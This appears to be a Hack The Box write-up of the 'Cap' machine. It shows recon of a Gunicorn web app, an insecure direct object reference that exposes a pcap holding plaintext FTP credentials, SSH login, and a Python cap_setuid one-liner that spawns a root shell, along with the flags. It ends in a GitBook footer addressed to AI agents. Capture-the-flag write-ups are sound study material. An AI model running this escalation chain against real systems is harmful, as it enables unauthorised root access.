> For the complete documentation index, see [llms.txt](https://sgtdiddlywink.gitbook.io/htb/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sgtdiddlywink.gitbook.io/htb/machines/easy-machines/cap.md). # Cap

## TARGET IP: 10.10.10.245 ## HOST IP: 10.10.16.3 ## RECON ### WEBSITE ```url http://[TARGET IP] ```

* Looks like a data analytics page that I am currently signed into as `Nathan`. * The dropdown menu page under the user doesn't do anything. All of the buttons including the `Logout` don't point towards anything or do anything. * Take a look at the source code: ```html

Rashed sent you an email

09:35

Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.

Added

7 Minutes Ago

Lorem ipsum dolor sit amet consectetur.

You missed you Password!

09:20 Am

Member waiting for you Attention

09:35

Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.

You Added Kaji Patha few minutes ago

01 minutes ago

Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.

Ratul Hamba sent you an email

09:35

Hello sir , where are you, i am egerly waiting for you.

Rashed sent you an email

09:35

Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.

Rashed sent you an email

09:35

Rashed sent you an email

09:35

Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.

Rashed sent you an email

09:35

Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.

General Settings

Notifications

Toggle

Keep it 'On' When you want to get all the notification.

Show recent activity

Toggle

The for attribute is necessary to bind our custom checkbox with the input.

Show your emails

Toggle

Show email so that easily find you.

Show Task statistics

Toggle

The for attribute is necessary to bind our custom checkbox with the input.

Notifications

Toggle

Use checkboxes when looking for yes or no answers.

``` * There is a lot there but it looks like we have some new information: * We have a user named `Nathan` and possibly other users `Rashed`, `Kaji Patha`, and `Ratul Hamba`. * Checking out `curl` doesn't give us the version number of the `gunicorn` web server. ```bash curl [TARGET IP] -sI ```

* If we go to the home tab in the upper right and click on `Network Status`, we get some really good info about the machine without actually having to run an NMAP scan. * Looks like Ports 21, 22, and 80 are open.

* When I try something in the search bar, nothing pops up but a parameter is added to the URL. ```url http://[TARGET IP]/?search=[SEARCHED WORD]# ``` * I captured a packet with Burpsuite and received the following.

* Let's try the `Security Snapshot` button. This appears to grab some packet data over a 5 second period and creates a `pcap` file to look at. * We can also see that the URL shows a `data` parameter that after first use equals 1 and sequentially goes up. Let's set the parameter to `0` and see what it spits out. We'll also grab the `pcap` file from it. ```url http://[TARGET IP]/data/0 ```

* We can open this `pcap` file in wireshark to take a look at it and see if we can find any good information.

* WiresharkScanning through the Wireshark capture, we quickly find FTP credentials for the User `Nathan`.

``` nathan:Buck3tH4TF0RM3! ``` * We can now log into `nathan`'s account, list out the current working directory, and download the user flag. ``` ftp [TARGET IP] nathan Buck3tH4TF0RM3! ls -la get user.txt ``` ![](/files/ursvUPgtIuAmaliqqc07) * On our host system we can then look into the text file for the first flag. ``` cat user.txt ``` ![](/files/88RwujeDTh5A0zm081Wd) ``` user.txt: 1f896817980ce9dfee4c79c1922c5ae3 ``` ### WAPPALYZER

* The backend Language appears to be Python * Utilizes Gunicorn as a webserver * The Gunicorn "Green Unicorn" is a Python Web Server Gateway Interface HTTP server. It is a pre-fork worker model, ported from Ruby's Unicorn project. The Gunicorn server is broadly compatible with a number of web frameworks, simply implemented, light on server resources, and fairly fast. ### NMAP ```bash nmap [Target IP] ```

```bash nmap -A -Sv -p 21,22,80 [TARGET IP] ```

```bash sudo nmap [TARGET IP] -sS -sV --script http-headers -p 80 ```

## ENUMERATION ### GOBUSTER #### SUBDOMAIN ```bash gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt ```

* None of these are new to me and don't provide any new information. ```bash gobuster vhost -u http://[TARGET IP]/ -w /usr/share/dirb/wordlists/common.txt ```

### TARGET ENUMERATION * Now that we have credentials for `nathan`. We can spend some time exploring the target system for possible privilege escalation. * I'm going to use the credentials to log in through `SSH`. ``` ssh nathan@[TARGET IP] yes Buck3tH4TF0RM3! ```

* Try checking out what sudo privileges we have. ``` sudo -l Buck3tH4TF0RM3! ```

* Unfortunately, we have none so let's go digging around. * I spent some time digging around myself but didn't find anything. I decided to upload a copy of linpeas to the target account and perform some auto enumeration to help out. * I came across something interesting.

``` /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip ``` * I can verify the capability functions with the following command. This essentially allows for certain processes to have root privleges. Similar to SUID. ```bash getcap -r / 2>/dev/null ```

* This is great information as having the capabilities for `cap_setuid` set is a particularly vulnerable situation. * [Hacktricks](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities) and [GTFOBins](https://gtfobins.github.io/gtfobins/python/#capabilities) both have sections for exploiting this for privilege escalation. * Let's go with the privilege escalation from GTFOBins. ```bash /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' ``` ![](/files/1ScMOvea7zA49iuIsl6K) * And now I have root privileges. * Let's go get the root flag. ``` cat /root/root.txt ``` ![](/files/Put8wzE66Uur4HcuCST4) ``` ca9be49e3fbed8b6be99a27bcd9be60f ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://sgtdiddlywink.gitbook.io/htb/machines/easy-machines/cap.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.